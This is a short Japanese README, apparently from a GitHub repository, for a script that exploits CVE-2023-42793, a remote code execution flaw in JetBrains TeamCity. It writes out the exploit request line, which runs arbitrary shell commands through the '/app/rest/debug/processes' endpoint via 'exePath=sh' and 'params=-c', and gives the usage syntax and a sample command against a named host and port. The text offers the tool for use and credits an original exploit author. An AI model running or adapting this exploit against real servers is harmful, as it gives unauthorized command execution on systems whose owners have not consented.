
teamcity-exploit-cve-2023-42793
cve-2023-42793 の脆弱性を悪用するための簡単なスクリプトです。このエクスプロイトに関する追加の参考資料はこちら:
https://www.cnblogs.com/LittleHann/p/17843271.html
このスクリプトは、RCE 脆弱性をトリガーした後に "params" を自由に使ってコマンドを実行する機能を追加します:
RCE_ENDPOINT="${BASE_URL}:${PORT}/app/rest/debug/processes?exePath=sh¶ms=-c¶ms=${URLCMD}"
Usage: <base_url> <port> <command>
./TeamCity.sh blah.com 8111 "ls -lah"
オリジナルスクリプトはこちらです。クレジットはすべて作者に帰属します: https://github.com/Zenmovie/CVE-2023-42793